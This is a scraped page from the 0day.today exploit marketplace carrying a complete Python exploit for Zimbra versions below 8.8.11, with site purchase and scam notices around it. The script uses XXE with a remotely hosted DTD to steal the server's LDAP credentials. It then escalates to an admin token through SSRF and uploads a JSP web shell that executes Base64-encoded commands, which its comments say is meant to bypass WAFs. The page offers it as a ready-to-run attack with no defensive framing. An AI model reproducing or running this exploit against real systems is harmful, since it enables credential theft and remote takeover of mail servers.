0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery Vulnerability
Author
Risk
![](/img/risk/critlow_1.gif)
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery Vulnerability #coding=utf8 import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) base_url=sys.argv[1] base_url=base_url.rstrip("/") #upload file name and content #modify by k8gege #Connect "shell.jsp" using K8fly CmdShell #Because the CMD parameter is encrypted using Base64(bypass WAF) filename = "shell.jsp" fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>' print(base_url) #dtd file url dtd_url="https://k8gege.github.io/zimbra.dtd" """ <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> """ xxe_data = r"""<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "{dtd}"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>""".format(dtd=dtd_url) #XXE stage headers = { "Content-Type":"application/xml" } print("[*] Get User Name/Password By XXE ") r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15) #print r.text if 'response schema not available' not in r.text: print("have no xxe") exit() #low_token Stage import re pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>") pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>") username = pattern_name.findall(r.text)[0][2] password = pattern_password.findall(r.text)[0][2] print(username) print(password) auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="{xmlns}"> <account by="adminName">{username}</account> <password>{password}</password> </AuthRequest> </soap:Body> </soap:Envelope> """ print("[*] Get Low Privilege Auth Token") r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False) pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>") low_priv_token = pattern_auth_token.findall(r.text)[0] #print(low_priv_token) # SSRF+Get Admin_Token Stage headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";" headers["Host"]="foo:7071" print("[*] Get Admin Auth Token By SSRF") r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False) admin_token =pattern_auth_token.findall(r.text)[0] #print("ADMIN_TOKEN:"+admin_token) f = { 'filename1':(None,"whocare",None), 'clientFile':(filename,fileContent,"text/plain"), 'requestId':(None,"12",None), } headers ={ "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";" } print("[*] Uploading file") r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False) #print(r.text) print("Shell: "+base_url+"/downloads/"+filename) #print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)") print("[*] Request Result:") s = requests.session() r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers) #print(r.text) print("May need cookie:") print(headers['Cookie']) # 0day.today [2024-07-07] #